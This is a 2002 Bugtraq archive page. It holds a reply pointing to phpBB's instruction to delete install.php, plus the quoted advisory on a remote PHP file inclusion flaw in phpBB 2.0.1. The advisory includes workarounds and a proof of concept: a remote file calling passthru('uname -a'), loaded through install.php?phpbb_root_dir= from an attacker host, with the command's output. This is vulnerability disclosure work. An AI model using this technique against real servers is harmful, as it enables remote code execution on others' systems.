Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

RE: malicious PHP source injection in phpBB

From: "Nathan Anderson" <nathan () andersonsplace net>
Date: Mon, 17 Jun 2002 17:49:33 -0700
Morris,

        The install instructions tells you to DELETE the install.php.  :)

Quoting the Installing instructions (INSTALL.html)

"6. Important post-Install tasks for all installation methods
Once you have succssfully installed phpBB 2.0.0 you MUST ensure you remove
install.php, upgrade.php and update_to_FINAL.php files. Leaving these in
place is a very serious potential security issue. Additionally you may
delete the db/schemas, docs/ and contrib/ directories if you wish.

With these files deleted you should proceed to the administration panel.
Depending on how the installation completed you may have been directed there
automatically. If not, login as the administrator you specified during
install/upgrade and click the "Administration Panel" link at the bottom of
any page. Ensure that details specified in General -> Configuration are
correct!"

Nathan.



-----Original Message-----
From: morris Chang [mailto:onlooker () cnun xsdeny net]
Sent: Sunday, June 16, 2002 6:30 AM
To: bugtraq () securityfocus com
Subject: malicious PHP source injection in phpBB


JCC Security Advisory
June 16, 2002

malicious PHP source injection in phpBB

Description

phpBB is one of popular PHP bulletin board systems.
When allow_url_fopen = On and register_globals = On in php.ini, phpBB has
vulnerability because install.php contains dangerous codes.
So an attacker can include any files into server's PHP codes.

Impact

It's tested on phpBB 2.0.1. but I think all of phpBB 2 is affected.

Workaround

allow_url_fopen = off and register_globals = off.
and if complete install remove or rename install.php.
Or in install.php
-------install.php------------
define('IN_PHPBB', true);
$phpbb_root_path='./';
----------------------------
Put it
-------snip-----------------
$phpbb_root_dir='./';
----------------------------

Good idea to code that <<PHP_CODE
ini_set("register_globals", "Off");
ini_set ("allow_url_fopen", "Off");
PHP_CODE

Tested systems

phpBB 2.0.1 Debian GNU/Linux SID(x86)

Background

We checked the vulnerability with
"http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE"; and
 made a sample code, functions_selects.php,

--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------

and type the following URL to invoke this sample code.

TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/";

-------out put----------------------------
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
Warning: Cannot add header information - headers already sent by (output
started at http://210.117.152.118:6969/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182

Warning: Cannot add header information - headers already sent by (output
started at http://210.117.152.118:6969/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183

Warning: Cannot add header information - headers already sent by (output
started at http://210.117.152.118:6969/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/install.php on line 346
-----------------------------------------

thx for BlackKnight at r0ar
---
http://jcc.hackerslab.org(at morris Chang)

e-mail : morris () xsdeny net
Previous By Date Next
Previous By Thread Next

Current thread: